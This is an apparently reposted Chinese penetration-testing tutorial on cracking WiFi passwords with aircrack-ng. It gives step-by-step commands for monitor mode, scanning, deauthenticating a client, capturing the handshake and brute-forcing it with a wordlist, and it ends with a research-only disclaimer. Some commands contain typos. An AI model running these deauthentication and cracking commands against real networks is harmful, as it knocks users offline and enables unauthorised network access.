实验环境:免驱网卡、Kali、airmon-ng
实验概述:通过WIFI干扰使正常用户下线,下线后等待WIFI自动重新连接。这时候抓取该用户的登录包,登录包内包含了WIFI登录密码。再使用字典对登录包的登录密码进行枚举即可。
实验过程:
一、插入网卡
怼入网卡,查看IP多一个网卡就是怼好了。
二、清除影响进程
airmon-ng check kall #查看影响的进程
使用kill pvid杀掉进程
三、开启网卡监听
airmon-ng start wlan0 #开启网卡监听
ifconfig或iwconfig查看网卡名字是否更改,验证监听是否成功。
四、扫描附近WIFI
airodump-ng wlan0mon #扫描附近wifi
需要记住mac地址(BSSID)与信道(CH)。PWR为信号强度,越低信号越好。
五、扫描WIFI连接的终端
airodump-ng --bssid 00:5C:C2:26:36:F5-c 12-w test wlan0mon
六、断开连接的终端
aireplay-ng -0 20 -a 00:5C:C2:26:36:F5 -c 7E:C7:82:39:63:05 wlan0mon
-0 | 攻击次数 | -a | 路由器MAC地址 |
-c | 目标MAC地址 |
攻击完成终端的WIFI会断掉,用户根目录会生成连接的数据包文件。同时监听处会显示抓到的mac地址
七、开始爆破
aircrack-ng -w /root /big_pass.txt test-01.cap
原文始发于微信公众号(YongYe 安全实验室):近源渗透__WIFI密码枚举
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论